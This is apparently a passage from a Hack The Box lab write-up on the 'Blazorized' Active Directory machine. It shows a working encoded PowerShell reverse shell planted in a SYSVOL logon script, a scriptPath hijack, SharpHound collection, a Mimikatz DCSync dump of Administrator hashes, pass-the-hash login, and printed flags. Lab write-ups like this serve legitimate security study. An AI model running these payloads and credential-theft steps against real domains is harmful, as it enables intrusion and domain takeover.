	Directory: C:\windows\sysvol\domain\scripts\A32FF3AEAA23
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         7/3/2024   8:56 AM            178 02FCE0D1303F.bat 

    Directory: C:\windows\sysvol\sysvol\blazorized.htb\scripts\A32FF3AEAA23
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         7/3/2024   8:56 AM            178 02FCE0D1303F.bat

Logon scripts are usually found in C:\WINDOWS\SYSVOL\domain\scripts src

Logon Script

Check what's in the logon scripts directory:

*Evil-WinRM* PS C:\windows\sysvol\domain\scripts\A2BFDCF13BB2\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF> cat 2C0A3DFE2030.bat
:: TO-DO: Notify LSA_3214 to write the logonScript for SSA_6010

Get permissions:

*Evil-WinRM* PS C:\windows\sysvol> $acl = Get-Acl C:\windows\sysvol\domain\scripts\A2BFDCF13BB2\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF\2C0A3DFE2030.bat
*Evil-WinRM* PS C:\windows\sysvol> foreach ($property in $acl.PSObject.Properties) {
    Write-Output "$($property.Name): $($property.Value)"
}
PSPath: Microsoft.PowerShell.Core\FileSystem::C:\windows\sysvol\domain\scripts\A2BFDCF13BB2\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF\2C0A3DFE2030.bat
PSParentPath: Microsoft.PowerShell.Core\FileSystem::C:\windows\sysvol\domain\scripts\A32FF3AEAA23
PSChildName: 2C0A3DFE2030.bat
PSDrive: C
PSProvider: Microsoft.PowerShell.Core\FileSystem
CentralAccessPolicyId:
CentralAccessPolicyName:
Path: Microsoft.PowerShell.Core\FileSystem::C:\windows\sysvol\domain\scripts\A2BFDCF13BB2\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF\2C0A3DFE2030.bat
Owner: BLAZORIZED\RSA_4810
Group: BLAZORIZED\Domain Users
Access: System.Security.AccessControl.FileSystemAccessRule System.Security.AccessControl.FileSystemAccessRule System.Security.AccessControl.FileSystemAccessRule System.Security.AccessControl.FileSystemAccessRule System.Security.AccessControl.FileSystemAccessRule System.Security.AccessControl.FileSystemAccessRule
Sddl: O:S-1-5-21-2039403211-964143010-2924010611-1107G:DUD:AI(A;ID;0x1201bf;;;S-1-5-21-2039403211-964143010-2924010611-1107)(A;ID;0x1200a9;;;AU)(A;ID;0x1200a9;;;SO)(A;ID;FA;;;BA)(A;ID;FA;;;SY)(A;ID;FA;;;S-1-5-21-2039403211-964143010-2924010611-1107)
AccessToString: BLAZORIZED\RSA_4810 Allow  Write, ReadAndExecute, Synchronize
NT AUTHORITY\Authenticated Users Allow  ReadAndExecute, Synchronize
BUILTIN\Server Operators Allow  ReadAndExecute, Synchronize
BUILTIN\Administrators Allow  FullControl
NT AUTHORITY\SYSTEM Allow  FullControl
BLAZORIZED\RSA_4810 Allow  FullControl
AuditToString:
AccessRightType: System.Security.AccessControl.FileSystemRights
AccessRuleType: System.Security.AccessControl.FileSystemAccessRule
AuditRuleType: System.Security.AccessControl.FileSystemAuditRule
AreAccessRulesProtected: False
AreAuditRulesProtected: False
AreAccessRulesCanonical: True
AreAuditRulesCanonical: True
## Note: If shit is fuzzy it's because of other players! Had to restart machine.

Villain > generate payload=windows/netcat/powershell_reverse_tcp lhost=tun0 encode
Generating backdoor payload...
powershell -ep bypass -e BASE64_ENCODED_PAYLOAD
---
*Evil-WinRM* PS C:\windows\sysvol\domain\scripts\A2BFDCF13BB2\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF\2C0A3DFE2030> echo 'powershell -ep bypass -e UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAUABTAEgATwBNAEUAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAewAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAQwBQAEMAbABpAGUAbgB0ACgAJwAxADAALgAxADAALgAxADYALgA3ADIAJwAsADQANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACcAUABTACAAJwAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACcAPgAgACcAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkAfQAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A' > C:\windows\sysvol\domain\scripts\A2BFDCF13BB2\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF\2C0A3DFE2030.bat
*Evil-WinRM* PS C:\windows\sysvol\domain\scripts\A2BFDCF13BB2\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF> Set-DomainObject SSA_6010 -Set @{'scriptPath'='\\dc1\NETLOGON\A2BFDCF13BB2\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF\2C0A3DFE2030\2C0A3DFE2030.bat'} -Verbose
Verbose: [Get-DomainSearcher] search base: LDAP://DC=blazorized,DC=htb
Verbose: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=SSA_6010)(name=SSA_6010)(displayname=SSA_6010))))
Verbose: [Set-DomainObject] Setting 'scriptPath' to '\\dc1\NETLOGON\A2BFDCF13BB2\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF\2C0A3DFE2030\2C0A3DFE2030.bat' for object 'SSA_6010'

Im not sure why, but Villain payload kept failing to get connection from logon script. Using Powershell #3 (Base64) made the connection... Meanwhile I was trying different things and ended up using the following path. The domain directory would have probably also worked, but not gonna test it since I have shell......

*Evil-WinRM* PS C:\windows\sysvol\sysvol\blazorized.htb\scripts\A32FF3AEAA23> Set-DomainObject SSA_6010 -Set @{'scriptPath'='A32FF3AEAA23\rev.bat'} -Verbose
*Evil-WinRM* PS C:\windows\sysvol\sysvol\blazorized.htb\scripts\A32FF3AEAA23> upload rev2.bat C:\windows\sysvol\sysvol\blazorized.htb\scripts\A32FF3AEAA23\rev.bat
*Evil-WinRM* PS C:\windows\sysvol\sysvol\blazorized.htb\scripts\A32FF3AEAA23> Get-DomainUser | ? { $_.Displayname -eq "SSA_6010" } | Select name, scriptpath, lastlogon, logoncount

name     scriptpath           lastlogon            logoncount
----     ----------           ---------            ----------
SSA_6010 A32FF3AEAA23\rev.bat 7/3/2024 11:20:59 AM       3125

Privilege Escalation (Administrator)

└─$ listen
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.11.22:51683.

PS C:\Windows\system32> whoami /all

User Name           SID
=================== =============================================
blazorized\ssa_6010 S-1-5-21-2039403211-964143010-2924010611-1124

Group Name                                 Type             SID                                           Attributes
========================================== ================ ============================================= ==================================================
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                  Group used for deny only
NT AUTHORITY\INTERACTIVE                   Well-known group S-1-5-4                                       Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0                                       Mandatory group, Enabled by default, Enabled group
BLAZORIZED\Super_Support_Administrators    Group            S-1-5-21-2039403211-964143010-2924010611-1123 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1                                      Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

Privilege Name                Description                    State
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

Gather data as ssa_6010 user and exfiltrate it.

PS C:\users\public> .\SH.exe -c all --zipfilename sh.zip
---
*Evil-WinRM* PS C:\users\public> download 20240703113106_sh.zip

Writeup-24.png

Since mimikatz is interactive I upgraded the netcat to ConPtyShell.

└─$ cp /usr/share/windows-resources/mimikatz/x64/mimikatz.exe .
---
*Evil-WinRM* PS C:\users\public> upload mimikatz.exe mimi.exe
---
mimikatz # lsadump::dcsync /user:administrator
[DC] 'blazorized.htb' will be the domain
[DC] 'DC1.blazorized.htb' will be the DC server
[DC] 'administrator' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   :
Password last change : 2/25/2024 12:54:43 PM
Object Security ID   : S-1-5-21-2039403211-964143010-2924010611-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: f55ed1465179ba374ec1cad05b34a5f3
    ntlm- 0: f55ed1465179ba374ec1cad05b34a5f3
    ntlm- 1: eecc741ecf81836dcd6128f5c93313f2
    ntlm- 2: c543bf260df887c25dd5fbacff7dcfb3
    ntlm- 3: c6e7b0a59bf74718bce79c23708a24ff
    ntlm- 4: fe57c7727f7c2549dd886159dff0d88a
    ntlm- 5: b471c416c10615448c82a2cbb731efcb
    ntlm- 6: b471c416c10615448c82a2cbb731efcb
    ntlm- 7: aec132eaeee536a173e40572e8aad961
    ntlm- 8: f83afb01d9b44ab9842d9c70d8d2440a
    ntlm- 9: bdaffbfe64f1fc646a3353be1c2c3c99
    lm  - 0: ad37753b9f78b6b98ec3bb65e5995c73
    lm  - 1: c449777ea9b0cd7e6b96dd8c780c98f0
    lm  - 2: ebbe34c80ab8762fa51e04bc1cd0e426
    lm  - 3: 471ac07583666ccff8700529021e4c9f
    lm  - 4: ab4d5d93532cf6ad37a3f0247db1162f
    lm  - 5: ece3bdafb6211176312c1db3d723ede8
    lm  - 6: 1ccc6a1cd3c3e26da901a8946e79a3a5
    lm  - 7: 8b3c1950099a9d59693858c00f43edaf
    lm  - 8: a14ac624559928405ef99077ecb497ba
...

Go over to crackstation

Writeup-25.png

Trying admin with cracked password failed.

└─$ evil-winrm -i 10.10.11.22 -u 'administrator' -p 'qaz123!'

Using the pass the hash method we are able to login.

└─$ evil-winrm -i 10.10.11.22 -u 'administrator' -H 'f55ed1465179ba374ec1cad05b34a5f3'

Flags

*Evil-WinRM* PS C:\Users> ls -Recurse -Filter *.txt

    Directory: C:\Users\Administrator\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        5/29/2024   3:42 PM            159 note.txt
-ar---         7/3/2024   2:04 PM             34 root.txt

    Directory: C:\Users\NU_1055\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         7/3/2024   2:04 PM             34 user.txt

*Evil-WinRM* PS C:\Users> ls -Recurse -Filter *.txt | cat
If you enjoyed this machine and want to learn more about DACL attacks, check out the 'DACL Attacks I' and 'DACL Attacks II' modules on HTB Academy.

- Pedant
5c81a83ff1166d58a4883b51762daea0
2bcf338975762fac5c9e0ca044dcfbeb

---

Writeup referenced:https://blog.csdn.net/m0_52742680/article/details/140102307